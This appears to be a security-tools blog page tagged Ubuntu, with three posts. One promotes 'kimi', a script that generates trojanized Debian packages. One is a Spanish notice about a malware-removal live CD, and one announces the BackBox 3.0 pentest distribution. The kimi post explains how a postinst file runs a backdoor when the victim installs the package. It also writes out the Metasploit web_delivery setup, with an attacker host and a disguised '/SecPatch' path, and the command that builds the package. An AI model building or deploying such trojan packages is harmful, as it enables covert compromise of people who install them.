This is default featured slide 1 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

This is default featured slide 2 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

This is default featured slide 3 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

This is default featured slide 4 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

This is default featured slide 5 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

Showing posts with label Ubuntu. Show all posts
Showing posts with label Ubuntu. Show all posts

kimi - Script To Generate Malicious Debian Packages (Debian Trojans)



Script to generate malicious debian packages (debain trojans).

Kimi is name inspired from "Kimimaro" one of my favriote charater from anime called "Naruto".

Kimi is a script which generates Malicious debian package for metasploit
which consists of bash file. the bash file is deployed into "/usr/local/bin/" directory.

Backdoor gets executed just when victim tries to install deb package due to postinst file

Bash file injects and also acts like some system command which when executed by victim 
and attacker hits with session.

Plus Points :
  • Fully indiependent. Means user no need to install any debian package creator
  • Can be integrated with any payload generator easily due to engagements of arguemt (lame :P i know) 

Kimi basically depends upon web_delivery module and every thing is automated. 
all the attacker needs is to do following settings :

Setting up Web_Delivery in msf :
msf > use exploit/multi/script/web_delivery
msf exploit(web_delivery) > set srvhost 192.168.0.102
srvhost => 192.168.0.102
msf exploit(web_delivery) > set uripath /SecPatch
uripath => /SecPatch
msf exploit(web_delivery) > set Lhost 192.168.0.102
Lhost => 192.168.0.102
msf exploit(web_delivery) > show options
msf exploit(web_delivery) > exploit

Generating Malicious payload :
dreamer@mindless ~/Desktop/projects/kimi $ sudo python kimi.py -n nano -l 127.0.0.1 -V 1.0

NOTE :: This project was made to be integrated with Venom Shellcode Generator 1.0.13.
It can be used standalone also all user needs is to change uripath in msf variables

Tested on :
  • Linux Mint 17.2 Cinnamon (Ubuntu 14.04) 
  • ParrotOS (Debian Jessie)
  • Kali Rolling 2.0

Updates :::
-- Added "postinst" file creation function to make embeded malicious file execution automated
-- Added RC file generation function to fully automate with handler opening, means no need to
set handler manually
-- Patched some common bugs [special thanks to r00t 3xp10it :)]


[Ubuntu Malware Removal Toolkit 1.2] Distro para eliminar malware en Windows



Se ha publicado nueva versión del Ubuntu Malware Removal Toolkit 1.2, una herramienta de seguridad para eliminar virus y malware de tu equipo.

Ubuntu Malware Removal Toolkit 1.2 está basada en la distribución Ubuntu Linux y puede arrancar en modo LiveCD, sin necesidad de instalación en disco duro. Aunque está basada en Linux, su campo de batalla es preferentemente sistemas operativos Windows, en los que puede eliminar virus y malware de tu equipo e incluso modificaciones maliciosas del registro Windows.

Entre sus características destacan:
  • Detectar y limpiar malware Windows directamente desde el LiceCD usando las mejores herramientas gratuitas.
  • Sencillo de utilizar incluso para usuarios noveles.
  • Integra scripts Nautilus personalizables que facilitan tareas como escaneo o chequeo del hash de ficheros o directorios.
  • Encontrar información online pudiendo navegar con Firefox desde el LiveCD.
  • Soporte de los protocolos de red Windows, es decir, Ubuntu MRT puede navegar por las redes Windows, resolver los nombres de red de equipos, montar carpetas compartidas e incluso usar RDP para controlar remotamente servidores Windows.
  • Se puede crear un pendrive LiveUSB de manera sencilla desde el LiveCD.
  • Navegar y buscar archivos del registro de Windows, detectar problemas con el timestamp NTFS y mucho más…
  • Buscar online los hashes de archivos con un sólo clic de ratón (Virustotal.com, Team Cymru MHR y otros servicios).
  • Analizar el tráfico de red utilizando las herramientas ntop y BotHunter.

[BackBox Linux] Version 3.0

BackBox is a Linux distribution based on Ubuntu Desktop, and designed for performing penetration testing, incident response, computer forensics, and intelligence gathering. It uses the Xfce desktop environment, and is developed by Raffaele Forte and a small but dedicated team.
BackBox+Linux+version+3.0+released
This release include features such as the new Linux Kernel 3.2 flower and Xfce 4.8. Apart from the system major upgrade, all auditing tools are up to date as well.
What's new
  • System upgrade
  • Bug corrections
  • Performance boost
  • Improved start menu
  • Improved Wi-Fi dirvers (compat-wireless aircrack patched)
  • New and updated hacking tools
System requirements
  • 32-bit or 64-bit processor
  • 512 MB of system memory (RAM)
  • 4.4 GB of disk space for installation
  • Graphics card capable of 800×600 resolution
  • DVD-ROM drive or USB port